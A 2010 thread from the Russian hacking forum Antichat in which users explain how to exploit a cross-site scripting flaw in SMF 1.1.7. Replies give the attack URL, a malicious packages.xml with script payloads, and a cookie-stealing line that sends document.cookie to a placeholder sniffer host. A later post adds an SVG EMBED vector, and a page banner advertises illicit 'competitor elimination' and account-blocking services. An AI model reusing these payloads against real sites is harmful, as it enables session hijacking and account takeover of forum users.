Форум АНТИЧАТ - Сплойт под SMF 1.1.7

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Сплойт под SMF 1.1.7

Опции темы

Поиск в этой теме

Опции просмотра

Сплойт под SMF 1.1.7

09.01.2010, 09:53

Gos

Новичок

Регистрация: 27.09.2007

Сообщений: 6

Провел на форуме:
115018

Репутация: 0

Сплойт под SMF 1.1.7

Подскажите, как использовать данный эксплойт. Схема действий, хотя бы вкратце..

http://www.exploit-db.com/exploits/7866

Я понимаю, что наверняка много подобных тем, но в поиске почти ничего не нашел... Буду очень благодарен.

09.01.2010, 10:12

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

Провел на форуме:
2080216

Репутация: 150

Отправить сообщение для Sleep с помощью ICQ

http://атакуемыйсайт.com/index.php?action=packageget;sa=browse;absolute=htt p://твой сайт.com

а на нем файл packages.xml
с таким вот содержанием:

PHP код:


		
			
<?xml version="1.0"?>

<!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">

<!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

XSRF SMF PoC By Xianur0

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->



<package-list xmlns="http://www.simplemachines.org/xml/package-list"

xmlns:smf="http://www.simplemachines.org/">

<list-title>Xianur0 Was Here</list-title>



<section>

    <title>SMF XSS PoC By Xianur0</title>

    <text><![CDATA[<script>alert('XSS')</script>]]></text>

    <modification>

        <id>Xianur0:XSMF</id>

        <name>SMF PoC By Xianur0</name>

        <filename>smfexploit.zip</filename>

        <version>0.1</version>

        <author email="uxmal666@gmail.com">Xianur0</author>

        <description><![CDATA[<script>alert(document.cookie)</script>]]></description>

    </modification>

</section>

</package-list>

эммм... как бэ вроде так

09.01.2010, 10:26

Gos

Новичок

Регистрация: 27.09.2007

Сообщений: 6

Провел на форуме:
115018

Репутация: 0

Цитата:

Сообщение от Sleep

эммм... как бэ вроде так

это я и сам прочитал) Интересует схема действий, при использовании. Где потом брать куки? куда вставлять айфрейм?

09.01.2010, 10:43

Sleep

Участник форума

Регистрация: 31.10.2007

Сообщений: 193

Провел на форуме:
2080216

Репутация: 150

Цитата:

PHP код:


		
			
 <text><![CDATA[<script>alert('XSS')</script>]]></text>

Цитата:

PHP код:


		
			
 <text><![CDATA[<script>img = new Image(); img.src = "http://адрес сниффера/img.gif?"+document.cookie;</script>]]></text>

можно так...

09.01.2010, 10:47

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от Gos

Это уже к сплоиту не имеет отношения. Читай статьи про XSS.

29.01.2010, 16:31

SEKTOR3A

Новичок

Регистрация: 02.05.2009

Сообщений: 18

Провел на форуме:
31604

Репутация: -3

плиз как использовать данный script ,как сделать ссылку на снифер в данной ситуации,Спасибо.

<EMBED SRC="data:image/svg+xml;base64,как сделать ссылку на снифер" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Последний раз редактировалось SEKTOR3A; 29.01.2010 в 16:34..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Хостинги под сайты,фото,файлы.	Vandam	ПО для Web разработчика	2	11.02.2009 15:08

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход